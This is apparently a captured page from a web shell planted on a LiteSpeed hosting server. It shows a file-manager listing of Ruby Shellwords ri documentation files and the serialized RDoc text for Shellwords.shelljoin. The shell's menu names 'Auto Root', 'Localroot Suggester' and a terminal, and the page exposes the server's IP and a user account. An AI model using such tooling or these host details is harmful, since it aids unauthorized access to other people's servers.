Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.222
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
Shellwords /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Shellwords.ri
3.4
KB
-rw-r--r--
2026-04-07 17:22
escape-c.ri
266
B
-rw-r--r--
2026-04-07 17:22
join-c.ri
262
B
-rw-r--r--
2026-04-07 17:22
shellescape-c.ri
1.6
KB
-rw-r--r--
2026-04-07 17:22
shellescape-i.ri
1.6
KB
-rw-r--r--
2026-04-07 17:22
shelljoin-c.ri
1.12
KB
-rw-r--r--
2026-04-07 17:22
shelljoin-i.ri
1.12
KB
-rw-r--r--
2026-04-07 17:22
shellsplit-c.ri
1.06
KB
-rw-r--r--
2026-04-07 17:22
shellsplit-i.ri
1.06
KB
-rw-r--r--
2026-04-07 17:22
shellwords-c.ri
274
B
-rw-r--r--
2026-04-07 17:22
shellwords-i.ri
273
B
-rw-r--r--
2026-04-07 17:22
split-c.ri
264
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI"shelljoin:ETI"Shellwords::shelljoin;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"ABuilds a command line string from an argument list, +array+.;To:RDoc::Markup::BlankLine o; ; [I"MAll elements are joined into a single string with fields separated by a ;TI"Ospace, where each element is escaped for the Bourne shell and stringified ;TI"using +to_s+.;T@o:RDoc::Markup::Verbatim; [I"Iary = ["There's", "a", "time", "and", "place", "for", "everything"] ;TI"!argv = Shellwords.join(ary) ;TI":argv #=> "There\\'s a time and place for everything" ;T:@format0o; ; [I"5Array#shelljoin is a shortcut for this function.;T@o;; [I",ary = ["Don't", "rock", "the", "boat"] ;TI"argv = ary.shelljoin ;TI"&argv #=> "Don\\'t rock the boat" ;T; 0o; ; [I"RYou can also mix non-string objects in the elements as allowed in Array#join.;T@o;; [I"-output = `#{['ps', '-p', $$].shelljoin}`;T; 0: @fileI"lib/shellwords.rb;T:0@omit_headings_from_table_of_contents_below000[[I" join;To;; [ ;@';0I"(array);T@'FI"Shellwords;TcRDoc::NormalModule00